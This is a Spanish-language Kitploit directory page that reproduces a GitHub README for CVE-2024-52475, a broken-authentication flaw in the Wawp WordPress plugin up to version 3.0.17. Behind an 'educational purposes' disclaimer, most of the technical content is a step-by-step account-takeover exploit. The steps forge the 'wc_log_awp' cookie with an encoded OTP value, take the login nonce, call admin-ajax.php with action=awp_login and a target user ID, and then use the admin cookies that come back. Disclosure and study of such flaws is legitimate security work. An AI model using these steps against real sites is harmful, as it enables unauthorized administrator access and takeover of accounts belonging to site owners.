Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-52475 — Autenticación rota en el plugin de Wordpress (Wawp Plugin < 3.0.18) | Kitploit
Herramientas/GitHubGitHub/ubaydev/cve-2024-52475
Análisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHububaydev/cve-2024-52475

CVE-2024-52475

Autenticación rota en el plugin de Wordpress (Wawp Plugin < 3.0.18)

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

(CVE-2024-52475) El plugin Wawp de WordPress <= 3.0.17 es vulnerable a autenticación rota (toma de control de cuenta)

¡Descargo de responsabilidad!

La información proporcionada en este documento sobre CVE-2024-52475 es solo para fines educativos y de aprendizaje. No fomentamos ni autorizamos el uso de esta información para fines perjudiciales, incluidos, entre otros, la explotación, la manipulación de sistemas u otras actividades ilegales.

Hacemos hincapié en la importancia de la ética en la exploración y comprensión de las vulnerabilidades de seguridad. Recuerde que el uso de esta información debe realizarse de manera responsable y de acuerdo con las leyes aplicables. Cualquier acción realizada con esta información es responsabilidad exclusiva del usuario.

Al utilizar este material, usted acepta no hacer un mal uso de la información proporcionada y asume toda la responsabilidad por cualquier consecuencia que pueda surgir del uso de dicha información.

Introducción

Después de revisar algunas fuentes y código relacionado sobre este CVE, encontré algunas rarezas y fallos en el archivo class-login.php del plugin Wawp en la versión 3.0.17 en adelante. El fallo está en las líneas 252 a 257, donde el código decodifica el OTP de la cookie 'wc_log_awp'. Eso permite que alguien irresponsable establezca la cookie manualmente a través de DevTools o de otra forma. 1.jpg

Pruebas

  1. Establezca la cookie 'wc_log_awp' manualmente desde DevTools, con este valor 'VFZSSmVrMVVUWGc9' decodificado: (123131)
  2. Encuentre el nonce de inicio de sesión en la página de inicio/acceso 1.jpg o 1.jpg
  3. Y vaya directamente a esta URL
    root@kitploit:~
    http://wordpress.test/wp-admin/admin-ajax.php?action=awp_login&nonce=LOGIN_NONCE&code=123131&user=USER_ID
    
  4. Si la respuesta es como esta, el exploit se ha realizado correctamente 1.jpg
  5. Compruebe las cookies de administrador desde DevTools y vaya a /wp-admin 1.jpg

Invítame un café:

  • saweria.co
  • buymeacoffee.com
  • trakteer.id

Referencia:

https://patchstack.com/database/vulnerability/automation-web-platform/wordpress-wawp-plugin-3-0-18-account-takeover-vulnerability

Agradecimientos:

Alá, Muhammad SAW, stealthcopter, Markdown Monster, mi familia, ¿y tú?

Descargar herramienta